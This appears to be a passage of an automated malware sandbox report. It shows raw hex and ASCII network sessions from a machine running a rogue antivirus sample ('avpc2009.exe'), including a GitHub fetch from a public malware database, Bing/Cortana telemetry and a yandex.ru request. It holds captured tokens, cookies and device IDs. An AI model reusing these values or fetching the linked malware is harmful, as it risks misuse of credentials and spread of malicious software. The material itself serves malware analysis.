                                                                                                                                                    2022-09-29 12:59:27 UTC38228INData Raw: 38 56 32 2e 35 61 31 20 31 20 30 20 30 31 31 2d 31 68 38 7a 4d 35 20 31 32 2e 32 35 76 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2e 32 6c 31 2e 34 35 2d 31 2e 30 38 37 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 33 20 30 4c 38 2e 36 20 31 35 2e 37 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 34 2d 2e 32 76 2d 33 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31
                                                                                                                                                    Data Ascii: 8V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 1
                                                                                                                                                    2022-09-29 12:59:27 UTC38229INData Raw: 65 61 6d 22 20 73 72 63 3d 22 22 20 77 69 64 74 68 3d 22 32 38 22 20 68 65 69 67 68 74 3d 22 32 38 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 6e 61 6d 65 20 66 6c 65 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 74 65 78 74 2d 6c 65 66 74 20 6e 6f 2d 77 72 61 70 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74
                                                                                                                                                    Data Ascii: eam" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subt
                                                                                                                                                    2022-09-29 12:59:27 UTC38231INData Raw: 67 2d 30 20 70 2d 32 20 70 2d 6c 67 2d 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 70 61 79 6c 6f 61 64 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 6f 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 69 74 65 20 68 65 61 64 65 72 20 6d 65 6e 75 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74
                                                                                                                                                    Data Ascii: g-0 p-2 p-lg-0" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;site header menu&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot
                                                                                                                                                    2022-09-29 12:59:27 UTC38232INData Raw: 32 32 45 43 0d 0a 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 75 74 68 65 6e 74 69 63 69 74 79 5f 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 39 6b 79 73 41 54 4f 48 32 4c 49 43 64 39 45 43 7a 54 6f 38 54 73 4c 67 47 6b 70 64 6c 70 75 73 4a 6e 32 41 4d 6a 70 48 4a 63 4d 41 45 74 36 37 77 56 55 68 64 4f 49 68 50 57 52 6d 4c 72 71 62 4e 59 51 42 46 63 6e 70 37 37 4c 6b 56 58 7a 64 54 6b 72 39 64 41 22 20 2f 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 3e 0a 20 20 20 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 0a 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64
                                                                                                                                                    Data Ascii: 22EChidden" name="authenticity_token" value="9kysATOH2LICd9ECzTo8TsLgGkpdlpusJn2AMjpHJcMAEt67wVUhdOIhPWRmLrqbNYQBFcnp77LkVXzdTkr9dA" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field
                                                                                                                                                    2022-09-29 12:59:27 UTC38233INData Raw: 69 64 3d 22 69 6e 74 65 67 72 61 74 69 6f 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 34 31 36 36 22 20 68 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 22 20 76 61 6c 75 65 3d 22 31 36 36 34 34 35 36 33 36 37 37 36 36 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74
                                                                                                                                                    Data Ascii: id="integration" autocomplete="off" class="form-control" /><input type="text" name="required_field_4166" hidden="hidden" class="form-control" /><input type="hidden" name="timestamp" value="1664456367766" autocomplete="off" class="form-control" /><input t
                                                                                                                                                    2022-09-29 12:59:27 UTC38235INData Raw: 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 63 31 61 64 37 61 32 33 30 30 33 33 33 32 37 31 61 63 63 61 36 66 64 37 34 31 62 32 64 64 39 36 36 38 38 36 38 38 30 38 62 31 34 32 61 33 66 61 35 62 39 30 38
                                                                                                                                                    Data Ascii: type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c1ad7a2300333271acca6fd741b2dd9668868808b142a3fa5b908


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    143192.168.2.349780204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:42 UTC38236OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                    Origin: https://www.bing.com
                                                                                                                                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                    Content-type: text/xml
                                                                                                                                                    X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                    X-PositionerType: Desktop
                                                                                                                                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                    X-Search-SafeSearch: Moderate
                                                                                                                                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                    X-UserAgeClass: Unknown
                                                                                                                                                    X-BM-Market: US
                                                                                                                                                    X-BM-DateFormat: M/d/yyyy
                                                                                                                                                    X-CortanaAccessAboveLock: false
                                                                                                                                                    X-Device-OSSKU: 48
                                                                                                                                                    X-BM-DTZ: -420
                                                                                                                                                    X-BM-FirstEnabledTime: 132061295966656129
                                                                                                                                                    X-DeviceID: 0100748C09004E33
                                                                                                                                                    X-BM-DeviceScale: 100
                                                                                                                                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                    X-BM-Theme: 000000;0078d7
                                                                                                                                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                    X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                                                                                    X-Agent-DeviceId: 0100748C09004E33
                                                                                                                                                    X-BM-CBT: 1660685844
                                                                                                                                                    X-Device-isOptin: true
                                                                                                                                                    X-Device-Touch: false
                                                                                                                                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                                                                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                    Host: www.bing.com
                                                                                                                                                    Content-Length: 88828
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
                                                                                                                                                    2022-09-29 12:59:42 UTC38239OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 38 63 37 66 36 62 34 61 64 66 33 34 33 64 32 62 63 61 66 64 34 65 33 30 64 63 65 61 38 36 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                                                                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>88c7f6b4adf343d2bcafd4e30dcea864</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                                                                                    2022-09-29 12:59:42 UTC38255OUTData Raw: 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 55 54 53 22 3a 31 36 36 34 34 38 38 37 38 31 32 33 36 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 33 31 38 31 37 36 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f
                                                                                                                                                    Data Ascii: bientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1664488781236}...</D><TS>1632359318176</TS></E><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivo
                                                                                                                                                    2022-09-29 12:59:42 UTC38271OUTData Raw: 36 39 38 30 2c 22 53 45 51 22 3a 31 34 2c 22 55 54 53 22 3a 31 36 36 34 34 38 38 37 38 31 32 33 36 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 33 38 34 39 31 32 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 63 61 66 30 64 61 36 61 65 34 61 61 34 64 33 32 38 65 61 34 32 63 37 39 62 34 38 39 38 31 65 31 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57
                                                                                                                                                    Data Ascii: 6980,"SEQ":14,"UTS":1664488781236}...</D><TS>1632359384912</TS></E><E><T>Event.ClientInst</T><IG>caf0da6ae4aa4d328ea42c79b48981e1</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientW
                                                                                                                                                    2022-09-29 12:59:42 UTC38287OUTData Raw: 31 2c 22 34 32 22 3a 31 2c 22 35 39 22 3a 31 2c 22 31 33 33 22 3a 31 2c 22 31 33 36 22 3a 31 2c 22 31 33 37 22 3a 35 2c 22 32 36 34 22 3a 31 2c 22 32 39 36 22 3a 31 7d 7d 7d 5d 7d 5d 5d 5d 3e 3c 2f 44 53 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22
                                                                                                                                                    Data Ascii: 1,"42":1,"59":1,"133":1,"136":1,"137":5,"264":1,"296":1}}}]}]...</DS><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo"
                                                                                                                                                    2022-09-29 12:59:42 UTC38303OUTData Raw: 47 72 6f 75 70 73 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 52 65 67 69 6f 6e 22 3a 22 53 65 61 72 63 68 53 75 67 67 65 73 74 69 6f 6e 73 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a 22 4c 2e 55 72 6c 22 2c 22 4b 22 3a 22 31 31 34 2e 31 22 7d 5d 7d 5d 7d 5d 7d 5d 5d 5d 3e 3c 2f 4c 3e 3c 2f 50 61 67 65 3e 3c 54 53 3e 31 36 33 32 33 35 39 32 38 38 30 30 33 3c 2f 54 53 3e 3c 4f 76 72 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 52 61 77 51 75 65 72 79 22 20 76 61 6c 75 65 3d 22 75 61 63 22 2f 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 49 73 51 75 65 72 79 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 2f 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 46 6f 72 6d 22 20 76 61 6c 75 65 3d 22 22 2f 3e 3c 75 73 65 72
                                                                                                                                                    Data Ascii: Groups","L":[{"T":"L.Box","Region":"SearchSuggestions","L":[{"T":"L.Url","K":"114.1"}]}]}]}]...</L></Page><TS>1632359288003</TS><Ovr><requestInfo key="RawQuery" value="uac"/><requestInfo key="IsQuery" value="false"/><requestInfo key="Form" value=""/><user
                                                                                                                                                    2022-09-29 12:59:42 UTC38319OUTData Raw: 5f 53 53 22 3a 7b 22 43 50 49 44 22 3a 22 31 36 36 34 34 38 38 37 30 37 32 36 33 22 2c 22 41 43 22 3a 22 31 22 2c 22 43 50 48 22 3a 22 34 65 66 36 36 31 66 32 22 7d 2c 22 53 52 43 48 55 49 44 22 3a 7b 22 56 22 3a 22 32 22 2c 22 47 55 49 44 22 3a 22 43 41 46 45 36 30 35 41 41 46 39 36 34 36 36 30 42 38 34 37 39 45 45 41 35 44 34 46 44 33 46 45 22 2c 22 64 6d 6e 63 68 67 22 3a 22 31 22 7d 2c 22 53 52 43 48 44 22 3a 7b 22 41 46 22 3a 22 4e 4f 46 4f 52 4d 22 7d 2c 22 53 52 43 48 55 53 52 22 3a 7b 22 44 4f 42 22 3a 22 32 30 32 32 30 39 32 39 22 7d 2c 22 53 52 43 48 48 50 47 55 53 52 22 3a 7b 22 53 52 43 48 4c 41 4e 47 22 3a 22 65 6e 22 7d 2c 22 41 4e 4f 4e 22 3a 7b 22 41 22 3a 22 45 36 45 41 45 46 33 30 44 37 45 39 43 31 34 35 39 32 33 43 30 36 38 41 46 46 46
                                                                                                                                                    Data Ascii: _SS":{"CPID":"1664488707263","AC":"1","CPH":"4ef661f2"},"SRCHUID":{"V":"2","GUID":"CAFE605AAF964660B8479EEA5D4FD3FE","dmnchg":"1"},"SRCHD":{"AF":"NOFORM"},"SRCHUSR":{"DOB":"20220929"},"SRCHHPGUSR":{"SRCHLANG":"en"},"ANON":{"A":"E6EAEF30D7E9C145923C068AFFF
                                                                                                                                                    2022-09-29 12:59:42 UTC38326INHTTP/1.1 204 No Content
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    X-MSEdge-Ref: Ref A: 857573D2BC294EC3ACE3598551186970 Ref B: FRA31EDGE0512 Ref C: 2022-09-29T12:59:42Z
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:42 GMT
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    144192.168.2.3497835.255.255.80443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:00 UTC38326OUTGET /1001 HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Accept: */*
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                    Host: yandex.ru
                                                                                                                                                    Cookie: _yasc=C9vZDDi53VxcYaUEaKZJVHqVGblx/XyLVpZgtY1YUcQS86qd; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1455.255.255.80443192.168.2.349783C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:00:00 UTC38326INHTTP/1.1 404 Not Found
                                                                                                                                                    Accept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
                                                                                                                                                    Accept-CH-Lifetime: 31536000
                                                                                                                                                    Cache-Control: no-cache,no-store,max-age=0,must-revalidate
                                                                                                                                                    Connection: Close
                                                                                                                                                    Content-Length: 17227
                                                                                                                                                    Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664456400.14977.98504.81981&h=stable-morda-any-vla-yp-11&yandexuid=3518356691664456400;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.net
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:00 GMT
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:00:00 GMT
                                                                                                                                                    Last-Modified: Thu, 29 Sep 2022 13:00:00 GMT
                                                                                                                                                    NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}
                                                                                                                                                    P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
                                                                                                                                                    Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}
                                                                                                                                                    Set-Cookie: _yasc=qLvD90cuW3++pDJfAIJW5C/OyI/i8ORtD2rdhlV+G6SpeC0q; domain=.yandex.ru; path=/; expires=Sat, 29-Oct-2022 13:00:00 GMT; secure
                                                                                                                                                    Set-Cookie: _yasc=QQnXkKdfaiZ1JE/MgcSPjIuyUq4Zc2j13hMJ2mq4X8OOweZx; domain=.yandex.ru; path=/; expires=Sat, 29-Oct-2022 13:00:00 GMT; secure
                                                                                                                                                    Set-Cookie: i=kjZv/vRDYZ7Mz8JhWgFMKOt8ORqJNYHxnoKNAtcuW//hbmpqcgjDvowb0EkcZx9B6PfS97LwnsJCAXIgvStyDTp+vOI=; Expires=Sat, 28-Sep-2024 13:00:00 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                                                                                                                                                    Vary: Cookie,Accept-Language,Accept-Encoding
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
